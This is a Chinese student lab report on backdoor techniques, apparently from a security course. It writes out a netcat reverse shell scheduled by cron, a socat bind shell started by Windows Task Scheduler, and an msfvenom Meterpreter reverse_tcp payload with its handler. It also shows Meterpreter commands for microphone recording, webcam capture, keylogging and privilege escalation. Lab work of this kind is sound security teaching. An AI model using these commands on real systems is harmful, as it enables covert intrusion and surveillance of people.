• 20155312 张竞予 Exp2 后门原理与实践


    Exp2 后门原理与实践

    目录


    基础问题回答

    (1)例举你能想到的一个后门进入到你系统中的可能方式?

    可能是我们点开某个链接的时候,自动加载了某个可执行文件,就类似于执行了实验中传入到windows中的backdoor.exe;也可能是我们点开某个网页时,该网页通过木马的方式在我们不知情的情况下自动下载了某个后门文件。

    (2)例举你知道的后门如何启动起来(win及linux)的方式?

    • linux中可能crontab文件被修改,周期性(定时)反向连接控制主机,只要控制主机保持侦听状态,就可以周期性启动后门,控制被控主机。
    • windows中可能是被动下载、接收了后门程序,当被控端点击运行该程序时,后门便会启动。

    (3)Meterpreter有哪些给你映像深刻的功能?

    能够获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。

    (4)如何发现自己有系统有没有被安装后门?

    利用防火墙,在防火墙看开启的端口及对应的进程,一般不是系统默认开启的端口都是可疑的,要找一下对应的进程,找到对应进程,对相应进程进行抓包,看他通信的数据,分析是不是后门。

    定期用360管家等软件对系统进行检测,及时处理疑似病毒、木马的程序。

    返回目录


    实践过程记录

    一、使用netcat获取主机操作Shell,cron启动

    首先查看WindowsIP和LinuxIP:

    • Windows下用命令ipconfig

    • Linux下用ifconfig -a

    Windows获得linux的shell:

    cron启动过程如下:

    1. 先在Windows系统下,监听8888端口
    2. 在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择"3";
    3. 在最后一行添加09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh,意思是在每个小时的第37分钟反向连接Windows主机的8888端口,设置成09的原因是我当时的时间是11点07,为了能立马看到效果,所以我将时间设置成了“09”(注意这里的IP地址应该为控制主机的IP);

    4.最后运行结果如下所示:

    返回目录

    二、使用socat获取主机操作Shell, 任务计划启动

    1.Windows+X,然后选择“控制面板”(win8下打开控制面板)

    2.右上角“查看方式”选择“大图标”

    3.点击管理程序->点击任务计划程序

    4.选择上方菜单栏中的“操作”->“创建任务”

    5.输入任务名

    6.新建触发器,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:8888 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口8888,同时把cmd.exe的stderr重定向到stdout上

    7.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行

    8.socat - tcp:192.168.199.196:8888,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的8888端口,此时可以发现已经成功获得了一个cmd shell:(此处的IP地址为WindowsIP)

    返回目录

    三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20155312_backdoor.exe”

    2.在Windows下执行ncat.exe -l 8888 > 20155312_backdoor.exe,这样被控主机就进入了接收文件模式

    3.在Linux中执行nc 192.168.199.196 8888 < 20155312_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP

    4.传送接收文件成功,如下图所示:

    5.在Kali中打开一个终端,使用msfconsole指令进入msf控制台

    6.接着输入use exploit/multi/handler使用监听模块,设置payload

    7.set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

    8.set LHOST 192.168.20.136,这里用的是LinuxIP,和生成后门程序时指定的IP相同

    9.set LPORT 8888,同样要使用相同的端口

    10.开始监听

    返回目录

    四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    1.使用record_mic指令可以截获一段音频:(可以+“-d 时间”来设定录制时间)

    2.使用webcam_snap指令可以使用摄像头进行拍照:

    3.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

    4.先使用getuid指令查看当前用户,使用getsystem指令进行提权,由于是Win8系统,提权失败:

    5.其他操作:

    • 使用screenshot指令可以进行截屏
    • 用webcam stream指令可以使用摄像头进行录像
    • ……

    返回目录


    实验总结与体会

    通过本次实验,我学会了如果对linux和windows植入后门,包括开启侦听、反向连接、生成后门程序、传送后门程序、控制被控主机、修改定时任务列表、使用socat获取主机操作Shell等。在动手实验的过程中既体会到了作为攻击者的乐趣,更加深刻的体会到了使用计算机时增强安全意识的重要性。平时上网的时候,一定要注意不点击不靠谱链接,下载软件时尽量选择官网下载,防止下载盗版软件时被捆绑下载其他后门程序。

    返回目录

  • 相关阅读:
    HDOJ 5347 MZL's chemistry 【打表】
    自定义轮播图插件
    Twitter Bootstrap:前端框架利器
    左边定宽,右边自适应两列布局
    JS 断点调试心得
    关于将多个json对象添加到数组中的测试
    普通选项卡+自动播放功能+向前/向后按钮 原生js
    线程队列、事件以及协程
    GIL锁、进程池与线程池、同步异步
    JoinableQueue类与线程
  • 原文地址:https://www.cnblogs.com/zjy1997/p/8673222.html
Copyright © 2020-2023  润新知